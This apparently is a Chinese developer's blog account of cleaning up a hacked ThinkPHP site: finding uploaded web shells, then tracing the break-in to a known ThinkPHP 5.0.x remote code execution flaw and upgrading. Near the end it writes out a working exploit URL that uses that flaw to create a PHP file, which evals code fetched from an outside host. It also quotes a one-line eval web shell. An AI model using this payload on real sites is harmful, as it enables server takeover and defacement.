广西电视台资讯频道,会宁县人民政府,钟学敏
【注:php、thinkphp】
事情是这样的~
2019年2月12日,根据客户的反应,说点击网站上的链接都会跳转的别的第三方的网站。然后就开始排查,登录上服务器,把项目的所有文件拷贝下来。
打开入口文件,里面的代码原来是被替换成静态的前端代码~我晕~ 当务之急是让网站可以正常的运行,先把这入口文件改回以前的代码上传到服务器,这样网站暂时是可以正常运行了。
但是需要找的问题的根本所在,这种网站代码恶意被修改的事我是第一次遇到,以前都是听说过没见过。 没有经验,就上百度。找一下这个问题的处理和排查流程。
根据网上所述,首先是将一句话代码(<?php @eval($_post['a'])>)上传到网站,然后通过这个一句上传一个可以操作网站目录的文件,再通过这个文件对网站的代码进行修改和上传。
所以现在要做的是:
1、首先找到已经被上传到网站的恶意文件,将其删除。
2、找到攻击者所利用的代码中的漏洞。
怎么找到那些已经被上传上来的文件,可以下载安全狗对拷贝下来的所有代码进行扫描,这些文件的代码有的写法会相同。会存在一些函数 eval、assert,这些文件还好找,找着后在服务器上删除就好了。难的是找到代码中的漏洞,网上提供了一些可能会出现漏洞的地方,一个是上传文件的地方,一个是编辑器插件中带的上传功能。
这些地方我一个试了试,排查了一遍。
2月13日,我发现网站首页又被修改了,看来问题的根本没有找对,继续在网上百度,问一些大佬。
2月14日,还是再找。
2月15日,一位大佬给我发来了一个thinkphp框架的漏洞信息,说的是thinkphp5.0 ~ 5.0.23之间的版本都存在一个严重的漏洞,可通过这个漏洞执行写文件的操作。
赶紧升级版本,升级的安全的版本。
之后,我也试了一下有漏洞的那个版本,真的可以很容易的将想要的代码写入到文件,然后在线上运行。
而且就是一行连接就能搞定:
项目域名加上
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3c?php%20@eval(file_get_contents(%22http%3a%2f%2fcqy666.cn%2fphp.jpg%22))?^%3e%3etest.php
然后访问test.php,就能操作网站的所有目录了。amezing~
如对本文有疑问,请在下面进行留言讨论,广大热心网友会与你互动!! 点击进行留言回复
PHP date_default_timezone_set()设置时区操作实例分析
我要评论
网友评论